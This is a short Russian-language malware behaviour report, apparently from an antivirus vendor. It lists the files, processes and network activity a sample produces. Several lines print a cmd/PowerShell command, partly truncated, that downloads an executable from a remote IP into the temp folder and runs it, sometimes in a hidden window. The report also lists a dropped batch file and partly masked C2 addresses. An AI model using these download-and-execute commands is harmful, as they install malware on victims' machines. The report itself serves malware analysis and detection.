Техническая информация
- $str1 как %temp%\llomn.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function orreq([String] $str1){(New-Object System.Net.WebClient).DownloadFile($str1,''%TMP%\llomn.exe'');Start-Process ''%TMP%\llomn.exe'';}try{orreq(''http://176.3...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
- %TEMP%\bakylqc.bat
- %TEMP%\1008094.cvr
- '17#.#1.249.148':80
- DNS ASK sl##ya.net
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function orreq([String] $str1){(New-Object System.Net.WebClient).DownloadFile($str1,''%TMP%\llomn.exe'');Start-Process ''%TMP%\llomn.exe'';}try{orreq(''http://176.3...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Bakylqc.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Bakylqc.bat" "